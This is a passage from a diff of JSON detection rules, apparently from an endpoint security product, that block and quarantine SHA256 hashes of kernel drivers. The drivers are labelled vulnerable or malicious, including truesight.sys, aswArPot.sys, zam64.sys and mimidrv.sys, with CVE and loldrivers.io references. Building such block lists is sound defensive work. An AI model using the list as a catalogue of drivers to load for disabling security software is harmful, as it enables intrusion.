+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "823b12d0-a926-59c3-9229-bb7e5c0f6a09",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146402Z",
+ "creation_date": "2026-03-23T11:45:31.146404Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146409Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "74edf2e45870d507c804ec269419b327cf2bbff82dd9330dfc91ebc84192f521",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "823b1426-bd3d-5db3-93ea-b9006a2bf178",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.971714Z",
+ "creation_date": "2026-03-23T11:45:29.971716Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.971721Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "082adcdc2d246d2291bcf135a7519840a84f27cfa3143d1372a9e2aa5e514dbd",
+ "comment": "MalwareFox AntiMalware Vulnerable Driver (aka zam64.sys and zam32.sys) [CVE-2021-31727, CVE-2021-31728] [https://www.loldrivers.io/drivers/e5f12b82-8d07-474e-9587-8c7b3714d60c/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "825c2dbe-c2a3-54cb-ba17-2912988484af",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.969906Z",
+ "creation_date": "2026-03-23T11:45:29.969908Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.969914Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3b38427f167fde644868a62f0aa1ed03790137905c97024ac21729fa6153eca2",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "825c9d7d-51f7-5863-b60d-52e6654c926d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.493967Z",
+ "creation_date": "2026-03-23T11:45:31.493971Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.493979Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b023404cb64ca532643fa25c600890f00fbfe3449ce1d0f103492318febfce27",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "825d584e-3027-5d05-8aca-a26f78c71a3e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.815787Z",
+ "creation_date": "2026-03-23T11:45:31.815791Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.815799Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7e83096a0dcb5fecc798c4e0aac70c9bfa05801fdb75c723d7a539652837db8f",
+ "comment":
"Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8269a3b1-365e-5497-8571-40e7d72a4717", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.823792Z", + "creation_date": "2026-03-23T11:45:31.823795Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.823804Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ea0f17275cd9620f94b482035cdf441a164771c997e84c0a997cfb48cb5db158", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "826b79d6-0b83-50a3-b474-5c79625b1b68", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + 
"origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.813985Z", + "creation_date": "2026-03-23T11:45:31.813988Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.813997Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5bfa6720e5972521751dd96257bb2e9d6bb264084dab8b6467dcb5710299c807", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "826f81b1-1f94-585c-adc3-dd28280fceb0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.149478Z", + "creation_date": "2026-03-23T11:45:31.149482Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.149491Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f838aec60dd23e9c02812dfd8dd0c2648cba2f5b8c2f8b289e5bb6a08f196dda", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "82721302-e015-509c-a6d2-b551d9cfdca9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.478074Z", + "creation_date": "2026-03-23T11:45:30.478078Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.478087Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c155197986db77be55716c49262ac009aefce647dae68268a2b9c7a7fd97c7a0", + "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "82742b7a-c6fa-5bb3-a8ae-8bcee41e5c1e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.141059Z", + "creation_date": "2026-03-23T11:45:31.141062Z", + "enabled": true, + 
"block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.141067Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f41b603a0aa3b477d30afc420f72c3db16a18f8786422560f7eb632d1482d805", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "827e9cee-160f-51ce-a190-91ad08d35c87", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.148774Z", + "creation_date": "2026-03-23T11:45:31.148776Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.148781Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b02e0b4f09877897346b28501466e4dec0393127646021e0a816ac39618c5317", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8285f53d-3cf5-5e68-bf1f-7b1d6a1e432d", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.811489Z", + "creation_date": "2026-03-23T11:45:31.811491Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.811496Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4a0149b64218c927cba80d302e6db403e9b4c6cbacb905070ff451303b7d26b5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8287b07b-56f0-5c4c-8d78-25491841c815", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.828755Z", + "creation_date": "2026-03-23T11:45:30.828757Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:30.828763Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f3935e0f74dd7996d9fd900eb7fb167ab301a00c6c9f9034428ee8b6a65502f1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "828f1d9e-9fbb-5944-bf12-1693491d7ca4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.151918Z", + "creation_date": "2026-03-23T11:45:31.151921Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.151930Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1ced1f634e780e4fef2f9b06268d8142207ca4294bbab677a923ec091f3baa3c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "8293ebec-d168-59ca-bee7-f5c86dc906d4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.835322Z", + "creation_date": "2026-03-23T11:45:30.835325Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.835333Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "208146a5e37dabdc40c022a8adcf6d95861e5e651a037998b7fe505d0b46c178", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "829c81aa-6265-51ca-bc89-d3411ff74334", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.617041Z", + "creation_date": "2026-03-23T11:45:29.617043Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.617048Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [], + "type": "hash", + "value": "af20c1b4eb703083979e6f4e211327495f7a0a27ace9a52bd22dd3737be7a8b1", + "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "82a14366-d713-5b46-a9f3-df5ca98f8fc3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.476831Z", + "creation_date": "2026-03-23T11:45:30.476835Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.476844Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6429f89dd7e9f8f7784736b6d3471be3c480d4eb4c9a573c698ede1dd64f5010", + "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "82a30800-b664-5b16-ba42-37bd938f6668", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + 
"id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.472620Z", + "creation_date": "2026-03-23T11:45:30.472624Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.472640Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b738eab6f3e32cec59d5f53c12f13862429d3db6756212bbcd78ba4b4dbc234c", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "82a910b2-1f2a-54fa-9631-0733d790c7a5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.464368Z", + "creation_date": "2026-03-23T11:45:30.464372Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.464381Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "29348ebe12d872c5f40e316a0043f7e5babe583374487345a79bad0ba93fbdfe", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "82a9226d-d49b-5a39-841d-7a8fa487b92e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.980803Z", + "creation_date": "2026-03-23T11:45:29.980805Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.980810Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f85cca4badff17d1aa90752153ccec77a68ad282b69e3985fdc4743eaea85004", + "comment": "Vulnerable Kernel Driver (aka IObitUnlocker.sys) [https://www.loldrivers.io/drivers/4bf4b425-10af-4cd4-88e6-beb4b947eb48/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "82ad7062-e6bf-5162-9aa8-576b401e2f4d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.978738Z", + "creation_date": "2026-03-23T11:45:29.978740Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:29.978746Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "18c909a2b8c5e16821d6ef908f56881aa0ecceeaccb5fa1e54995935fcfd12f7", + "comment": "Malicious Kernel Driver (aka gmer64.sys) [https://www.loldrivers.io/drivers/7ce8fb06-46eb-4f4f-90d5-5518a6561f15/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "82b7cda4-6ea1-5485-b5ae-7f8e65a772ac", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.985286Z", + "creation_date": "2026-03-23T11:45:29.985288Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.985294Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a97e5c6cd926fa47ab1a69963169223cc669bd654a2f128165ba4ebe1d08bd17", + "comment": "Dangerous Physmem Kernel Driver (aka HwRwDrv.Sys) [https://www.loldrivers.io/drivers/e4609b54-cb25-4433-a75a-7a17f43cec00/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "82c51088-f701-5369-83cd-e66b7d6c03cf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.145169Z", + "creation_date": "2026-03-23T11:45:32.145171Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.145177Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3768122b8ab7a518d3717cabdfdd7d9592ec986b3f85d40064fdf99c6f569f6b", + "comment": "Malicious Kernel Driver (aka driver_5c308aed.sys) [https://www.loldrivers.io/drivers/647f72e7-f378-4908-946c-5e45fab448e8/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "82d2ec3d-2beb-5a76-873b-26fd584267ed", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.490782Z", + "creation_date": "2026-03-23T11:45:31.490784Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.490789Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f4083b4353135cd29fbc32d2ecd1df91f86f667c93ddae3393158f6a126e98f4", + 
